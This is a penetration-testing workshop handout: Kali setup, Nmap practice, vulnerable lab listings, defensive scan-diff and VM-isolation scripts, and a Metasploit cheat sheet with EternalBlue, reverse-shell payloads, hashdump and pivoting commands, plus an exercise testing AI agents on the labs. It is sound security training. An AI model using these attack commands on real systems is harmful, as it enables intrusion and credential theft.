A hands-on introduction to penetration testing using Metasploit Framework.
- USB drive (minimum 16 or 32 GB; 64 GB or more recommended)
- Computer with boot from USB capability
- Basic Linux command line knowledge
- VirtualBox or VMware for some exercises
This workshop consists of four parts: environment setup, NMAP practice, practical exploitation exercises, and AI-assisted penetration testing evaluation.
Choose the appropriate guide for your operating system:
- macOS: https://www.kali.org/docs/usb/live-usb-install-with-mac/
  - Use Balena Etcher instead of dd for simplicity
  - Skip USB encryption for this workshop
- Windows: https://www.kali.org/docs/usb/live-usb-install-with-windows/
  - Verify all Rufus options match the guide exactly
Before starting:
- Read the entire installation guide first
- Verify all options in Rufus/Etcher match the guide exactly
- After installation, boot into Kali and familiarize yourself with the interface
Common Issues:
- Secure Boot may need to be disabled in BIOS
- Some machines require legacy boot mode for USB booting
Take 10-15 minutes to practice NMAP commands from the lecture.
Save your outputs with -oA practice_scan for later reference. A full command reference is in the presentation slides and in the quick reference at the end of this document.
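The -oA flag writes three files (practice_scan.nmap, practice_scan.gnmap and practice_scan.xml); the greppable .gnmap file is the easiest to post-process. The script below is an added example for this handout, not part of the original page or of Nmap: it parses a .gnmap file into a per-host inventory of open ports and diffs two scans, so you can see which services appeared since a baseline, which is how the saved output is used for asset inventory and change detection. The two scan snippets embedded in it are constructed, and the only format assumption is the standard tab-separated gnmap line with a "Ports:" field of port/state/proto/owner/service/rpc/version entries.

```python
"""Summarise and diff Nmap greppable output (the .gnmap file written by -oA).

Added example for this workshop handout, not part of the original page or of
Nmap. Assumes the standard .gnmap layout: tab-separated fields, a "Ports:"
field holding comma-separated port/state/proto/owner/service/rpc/version
entries. The two scan texts below are constructed for the demo.
"""
import sys
from typing import Dict, List, Set, Tuple

Service = Tuple[int, str, str, str]  # (port, proto, service name, version string)

# Constructed: a baseline scan of the lab subnet taken earlier.
BASELINE_GNMAP = """\
# Nmap 7.94 scan initiated as: nmap -sV -oA baseline_scan 192.168.56.0/24
Host: 192.168.56.101 ()\tStatus: Up
Host: 192.168.56.101 ()\tPorts: 80/open/tcp//http//Apache httpd 2.4.57/\tIgnored State: closed (999)
# Nmap done -- 256 IP addresses (1 host up) scanned in 10.01 seconds
"""

# Constructed: the later practice scan (what practice_scan.gnmap might hold).
PRACTICE_GNMAP = """\
# Nmap 7.94 scan initiated as: nmap -sV -oA practice_scan 192.168.56.0/24
Host: 192.168.56.1 ()\tStatus: Up
Host: 192.168.56.1 ()\tPorts: 22/open/tcp//ssh//OpenSSH 9.2/\tIgnored State: closed (999)
Host: 192.168.56.101 ()\tStatus: Up
Host: 192.168.56.101 ()\tPorts: 21/open/tcp//ftp//vsftpd 3.0.3/, 80/open/tcp//http//Apache httpd 2.4.57/, 139/filtered/tcp//netbios-ssn///\tIgnored State: closed (997)
# Nmap done -- 256 IP addresses (2 hosts up) scanned in 12.34 seconds
"""


def parse_gnmap(text: str) -> Dict[str, List[Service]]:
    """Return {host: [(port, proto, service, version), ...]} listing open ports only."""
    inventory: Dict[str, List[Service]] = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                      # comment lines and blank lines
        fields = line.split("\t")
        host = fields[0].split()[1]       # "Host: 192.168.56.101 ()" -> "192.168.56.101"
        inventory.setdefault(host, [])
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue
            for entry in field[len("Ports:"):].split(","):
                parts = entry.strip().split("/")
                if len(parts) < 7:
                    continue              # malformed entry: skip rather than crash
                port, state, proto, _owner, service, _rpc, version = parts[:7]
                if state == "open":
                    inventory[host].append((int(port), proto, service, version))
    return inventory


def new_exposures(old: Dict[str, List[Service]],
                  new: Dict[str, List[Service]]) -> Set[Tuple[str, int, str]]:
    """(host, port, proto) triples open in `new` that were not open in `old`."""
    def keys(inv: Dict[str, List[Service]]) -> Set[Tuple[str, int, str]]:
        return {(h, p, proto) for h, svcs in inv.items() for (p, proto, _s, _v) in svcs}
    return keys(new) - keys(old)


def report(old: Dict[str, List[Service]], new: Dict[str, List[Service]]) -> str:
    """Human-readable inventory of the new scan plus the delta against the baseline."""
    lines = []
    for host in sorted(new):
        for port, proto, service, version in sorted(new[host]):
            lines.append(f"{host:<16} {port:>5}/{proto:<4} {service:<12} {version}")
    delta = sorted(new_exposures(old, new))
    lines.append(f"newly exposed since baseline: {len(delta)}")
    lines.extend(f"  {h} {p}/{proto}" for h, p, proto in delta)
    return "\n".join(lines)


if __name__ == "__main__":
    # Usage: python3 gnmap_diff.py baseline_scan.gnmap practice_scan.gnmap
    if len(sys.argv) == 3:
        with open(sys.argv[1]) as f_old, open(sys.argv[2]) as f_new:
            old_text, new_text = f_old.read(), f_new.read()
    else:
        old_text, new_text = BASELINE_GNMAP, PRACTICE_GNMAP   # fall back to the constructed data
    print(report(parse_gnmap(old_text), parse_gnmap(new_text)))
```

Only ports in state "open" are kept, so a host that merely responds with filtered ports (like the netbios-ssn entry in the sample) does not show up as a new exposure; rerun the same -oA scan after each lab change and diff it against your first one to see what you opened up.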
Work through the labs you like (organized by difficulty). If you have Hack The Box experience, start with the easy labs to understand the MSF workflow, then jump to the advanced challenges (from about lab 8 onward).
1. Pentest Pivot Example (Simplest - 3 machines, clear tutorial)
- Repository: https://github.com/Charlie-belmer/pentest-pivot-example
- Perfect starting point with comprehensive walkthrough
2. Franc205 Pivoting Lab (10 containers, progressive walkthrough)
- Repository: https://github.com/franc205/pivoting-lab
- Structured progression through pivoting concepts
3. Cimihan123 Docker Pivot Lab (2-network basic setup)
- Repository: https://github.com/Cimihan123/Docker-Pivot-Lab
- Simple multi-network environment
4. Oliver Wiegers Pentest Lab (Multiple services, monitoring stack)
- Repository: https://github.com/oliverwiegers/pentest_lab
- Real-world service configurations
5. HackInOS:1 (WordPress → Docker containers)
- Download: https://www.vulnhub.com/entry/hackinos-1,295/
- Web application to container pivoting
6. Metasploitable 3 (2 VMs, manual network config required)
- Repository: https://github.com/rapid7/metasploitable3
- Official Rapid7 vulnerable environment
- Metasploitable 2 and Metasploitable 1 also exist
7. myHouse7 (1 VM + 7 containers, 20 flags)
- Download: https://www.vulnhub.com/entry/myhouse7-1,286/
- CTF-style with multiple objectives
8. WinterMute (OSCP-level, port knocking, exploitation chain)
- Download: https://www.vulnhub.com/entry/wintermute-1,239/
- Complex multi-stage exploitation
9. Capsulecorp Pentest (5-VM AD domain, MS17-010, multiple servers)
- Repository: https://github.com/R3dy/capsulecorp-pentest
- Active Directory pivoting practice
10. WaddleCorp Pentest (6-VM AD domain, PrintNightmare)
- Repository: https://github.com/NetPenguins/pentest-lab
- Modern AD vulnerabilities
11. SecGen (Framework - generates random vulnerable VMs)
- Repository: https://github.com/cliffe/SecGen
- Procedurally generated challenges
After completing exercises manually, evaluate AI tools' capabilities in solving the same challenges.
Download any MCP server that can execute terminal commands (e.g., Claude Code). Most modern AI coding assistants have this capability.
- Choose a lab you've already solved
- Provide the AI with the target information
- Ask it to solve the exercise in one shot
- Evaluate its approach and success rate
- Can it identify vulnerabilities correctly?
- Does it use appropriate MSF modules?
- Can it handle pivoting and lateral movement?
- How well does it adapt to unexpected responses?
# Start Metasploit console
msfconsole
# Initialize the database and update the framework
msfdb init
msfupdate
# (on Kali, sudo apt update && sudo apt install metasploit-framework is the supported update path)
# Search for modules
search <keyword>
search type:exploit platform:windows
# Use a module
use exploit/windows/smb/ms17_010_eternalblue
# Show module information
info
show options
show payloads
show targets
# Set required options
set RHOSTS <target_ip>
set LHOST <your_ip>
set PAYLOAD windows/meterpreter/reverse_tcp
# Check if target is vulnerable
check
# Run the exploit
exploit
run
# Meterpreter commands
sysinfo
getuid
hashdump
ps
migrate <PID>
# Pivoting
run autoroute -s <subnet>
use auxiliary/scanner/portscan/tcp
set RHOSTS <pivoted_subnet>
run
# Background current session
background
Ctrl+Z
# List sessions
sessions -l
# Interact with session
sessions -i <session_id>
# Kill session
sessions -k <session_id>

Internal Network: VMs can only communicate with each other. Set it in VM settings -> Network -> Attached to: Internal Network. Don't expose your vulnerable labs to the internet!
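The Internal Network setting is easy to get wrong on one adapter and leave a NAT or bridged path out of the lab. The script below is an added example for this handout, not part of the original page or of VirtualBox: it reads the key="value" output of VBoxManage showvminfo <vm> --machinereadable, flags every adapter that is not internal, host-only or disabled, and prints the VBoxManage modifyvm command that would move it onto the internal lab network. The nicN, intnetN, hostonlyadapterN and bridgeadapterN key names are assumed from that output format, the network name labnet is an assumption, and the sample output embedded in it is constructed.

```python
"""Audit a VirtualBox lab VM's network adapters for accidental exposure.

Added example for this handout, not part of the original page or of
VirtualBox. It reads the key="value" lines printed by
`VBoxManage showvminfo <vm> --machinereadable`; the nicN / intnetN /
hostonlyadapterN / bridgeadapterN key names are assumed from that format,
and the sample output below is constructed.
"""
import re
import subprocess
import sys
from typing import Dict, List, Tuple

# Adapter modes that keep traffic on the host (or disable the adapter entirely).
ISOLATED_MODES = {"none", "null", "intnet", "hostonly"}
# Anything else (nat, natnetwork, bridged, generic, or an unknown value) is treated as a path out.

KV_RE = re.compile(r'^([A-Za-z0-9_\-]+)="?(.*?)"?$')

# Constructed sample: one adapter on the lab's internal network, one left on NAT.
SAMPLE_INFO = """\
name="metasploitable3-lab"
memory=2048
nic1="intnet"
intnet1="labnet"
nic2="nat"
nic3="none"
nic4="none"
"""

Finding = Tuple[int, str, str, bool]  # (adapter index, mode, network name, isolated?)


def parse_machinereadable(text: str) -> Dict[str, str]:
    """Turn VBoxManage --machinereadable output into a dict (surrounding quotes stripped)."""
    info: Dict[str, str] = {}
    for line in text.splitlines():
        m = KV_RE.match(line.strip())
        if m:
            info[m.group(1)] = m.group(2)
    return info


def audit_nics(info: Dict[str, str]) -> List[Finding]:
    """One finding per adapter VirtualBox reports; unknown modes count as exposed."""
    findings: List[Finding] = []
    for n in range(1, 9):                      # VirtualBox VMs expose up to 8 adapters
        mode = info.get(f"nic{n}")
        if mode is None:
            continue
        network = (info.get(f"intnet{n}") or info.get(f"hostonlyadapter{n}")
                   or info.get(f"bridgeadapter{n}") or "")
        findings.append((n, mode, network, mode in ISOLATED_MODES))
    return findings


def is_isolated(info: Dict[str, str]) -> bool:
    """True only if every configured adapter is internal, host-only, or disabled."""
    return all(ok for _, _, _, ok in audit_nics(info))


def remediation(vm: str, findings: List[Finding], lab_net: str = "labnet") -> List[str]:
    """VBoxManage commands that move each exposed adapter onto the internal lab network."""
    return [f"VBoxManage modifyvm {vm} --nic{n} intnet --intnet{n} {lab_net}"
            for n, _mode, _net, ok in findings if not ok]


if __name__ == "__main__":
    # Usage: python3 vbox_isolation_check.py <vm-name>   (no argument: constructed sample)
    if len(sys.argv) == 2:
        vm = sys.argv[1]
        text = subprocess.run(["VBoxManage", "showvminfo", vm, "--machinereadable"],
                              capture_output=True, text=True, check=True).stdout
    else:
        vm, text = "metasploitable3-lab", SAMPLE_INFO
    info = parse_machinereadable(text)
    findings = audit_nics(info)
    for n, mode, network, ok in findings:
        print(f"nic{n}: {mode:<9} {network:<12} {'ok' if ok else 'EXPOSED'}")
    for cmd in remediation(vm, findings):
        print("fix:", cmd)
    sys.exit(0 if is_isolated(info) else 1)
```

Run it against each vulnerable VM before powering it on; the non-zero exit status makes it usable as a pre-flight check in a lab setup script. Host-only adapters are accepted because they only reach the host, which is what you need for the Kali attacker VM to talk to the targets.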
# Reinitialize database
msfdb reinit
# Check database status
msfdb status
# Manual fix
systemctl start postgresql
msfconsole -q
db_status
# Check network interfaces
ip addr show
ifconfig
# Test connectivity
ping <target_ip>
nmap -sn <target_subnet>
# Enable IP forwarding for pivoting (needs root; sudo sysctl -w net.ipv4.ip_forward=1 does the same)
echo 1 > /proc/sys/net/ipv4/ip_forward

MSF and VMs can be resource-intensive:
- Allocate at least 2GB RAM per VM
- Use free -h to monitor memory
- Leave modules you no longer need with the back command
- Restart msfconsole if it becomes sluggish
# Host discovery
nmap -sn 192.168.1.0/24
# Common scans
nmap -sS 192.168.1.1 # SYN scan (stealth)
nmap -sT 192.168.1.1 # TCP connect
nmap -sV 192.168.1.1 # Version detection
nmap -sC 192.168.1.1 # Default scripts
nmap -A 192.168.1.1 # Aggressive scan
# Port specification
nmap -p 22,80,443 192.168.1.1 # Specific ports
nmap -p- 192.168.1.1 # All ports
nmap -F 192.168.1.1 # Fast (top 100)
nmap --top-ports 1000 192.168.1.1
# Timing
nmap -T0 192.168.1.1 # Paranoid
nmap -T4 192.168.1.1 # Aggressive
# Output
nmap -oA scan_name 192.168.1.1 # All formats
# Evasion
nmap -D RND:10 192.168.1.1 # Decoys
nmap -f 192.168.1.1 # Fragment packets

# Core workflow
search <term>
use <module>
show options
set RHOSTS <ip>
set LHOST <ip>
exploit
# Session handling
sessions -l
sessions -i <id>
background
# Meterpreter basics
sysinfo
getuid
hashdump
getsystem
migrate <PID>

Essential commands for navigating the VM and following the exercises:
# Print current directory
pwd
# List files in current directory
ls
# List with details (size, permissions, dates)
ls -la
# Change directory
cd path/to/directory
# Go to home directory
cd ~
cd $HOME
# Go up one directory
cd ..
# Go to previous directory
cd -
# Create directory
mkdir directory_name
# Remove file
rm filename
# Remove directory and contents
rm -rf directory_name
# Copy file
cp source.txt destination.txt
# Move/rename file
mv oldname.txt newname.txt
# View file contents
cat file.txt
# View file with paging
less file.txt
# (press 'q' to quit)
# Edit file
vim file.txt
nano file.txt
# List running processes
ps aux
# Find specific process
ps aux | grep process_name
# Kill process by PID
kill <PID>
# Kill process by name
pkill process_name
# Stop running command
Ctrl+C
# Check disk space
df -h
# Check memory usage
free -h
# Check CPU/memory usage (live)
top
# (press 'q' to quit)
# Download file from URL
wget https://example.com/file.tar.gz
# Extract tar.gz archive
tar -xvzf file.tar.gz
# Set variable for current session
export CC=afl-cc
export CXX=afl-c++
# View variable
echo $CC
echo $HOME
# View all environment variables
env
# Make script executable
chmod +x script.sh
# Run executable
./script.sh
# Run with sudo (root privileges)
sudo command

Educational Purpose: This workshop teaches security testing techniques for authorized environments only. Use these skills exclusively on systems you own or have explicit written permission to test.
Legal Responsibility: You are solely responsible for your actions. The instructor and organizers accept no responsibility for:
- Unauthorized access to systems
- Data loss or system damage
- Legal consequences of misuse
- Any malicious use of techniques learned
Ethical Guidelines:
- Never test systems without explicit authorization
- Report vulnerabilities responsibly
- Respect privacy and confidentiality
- Use knowledge to improve security, not exploit it
By participating, you acknowledge understanding these terms and agree to use this knowledge ethically and legally.
- Armitage Manual - GUI for Metasploit with visual attack workflows and collaboration features. Try to find out if there is anything similar, free, and open-source (this is a project idea).
- Metasploit Custom Modules Development - Look for a section on creating your own exploits and auxiliary modules
- Metasploit Pro Features - Advanced features like social engineering campaigns and web app testing (try to see what modern software is capable of)
- Sliver C2 - Cross-platform implant framework with WireGuard, mTLS, compile-time obfuscation
- Havoc Framework - Sleep obfuscation via Ekko/Foliage, indirect syscalls, AMSI/ETW patching
- Covenant - .NET collaborative C2 with Roslyn dynamic compilation for Windows environments
- Mythic - Multi-user C2 platform with pluggable agents and custom payload development
- DEF CON AI Village - AI-assisted penetration testing and automated vulnerability discovery
- PentestGPT Paper - LLM-powered automated penetration testing framework (USENIX Security '24)
- Automated Penetration Testing: Formalization - Self-organizing architecture for automated pentesting
- PentestAgent with LLM - RAG-enhanced LLM agents for pentesting
- PenHeal: Two-Stage LLM Framework - Automated pentesting and remediation
- HackSynth - LLM agent evaluation framework for autonomous pentesting
- AutoPT: End2End Automated Web Pentesting - PSM-driven automated web pentesting
- Donut - Position-independent shellcode for .NET assemblies and unmanaged PE files
- BloodHound - Graph-based Active Directory attack path discovery
- Impacket - Python library for network protocols and AD attacks
- Rubeus - Kerberos abuse toolkit for ticket manipulation
- OffSec PEN-300 (OSEP) - Advanced evasion, process injection, AD exploitation chains; better than PEN-200
- Atomic Red Team - MITRE ATT&CK validation framework for testing your techniques
Author: Sasha Zyuzin
Good luck!